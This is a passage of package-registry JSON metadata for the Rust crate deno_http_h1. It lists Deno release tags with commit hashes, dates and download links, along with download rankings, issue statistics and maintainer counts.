ts"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T21:47:36.248Z","dependent_packages_count":0,"downloads":26248,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.27037299225424,"dependent_repos_count":14.115217286716748,"dependent_packages_count":18.643770747565274,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.676453675512086},"purl":"pkg:cargo/deno_http_h1","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_http_h1","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_http_h1","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_http_h1/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-08T15:20:51.828Z","issues_count":6662,"pull_requests_count":9678,"avg_time_to_close_issue":17121605.73139413,"avg_time_to_close_pull_request":1530875.9301115242,"issues_closed_count":3814,"pull_requests_closed_count":8069,"pull_request_authors_count":594,"issue_authors_count":2496,"avg_comments_per_issue":2.5022515761032724,"avg_comments_per_pull_request":0.7209134118619549,"merged_pull_requests_count":7045,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":682,"past_year_pull_requests_count":1198,"past_year_avg_time_to_close_issue":1327952.9787234042,"past_year_avg_time_to_close_pull_request":1317968.8908554572,"past_year_issues_closed_count":235,"past_year_pull_requests_closed_count":678,"past_year_pull_request_authors_count":194,"past_year_issue_authors_count":379,"past_year_avg_comments_per_issue":1.2272727272727273,"past_year_avg_comments_per_pull_request":1.1327212020033388,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":509,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1808,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":925,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":401,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_http_h1/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek 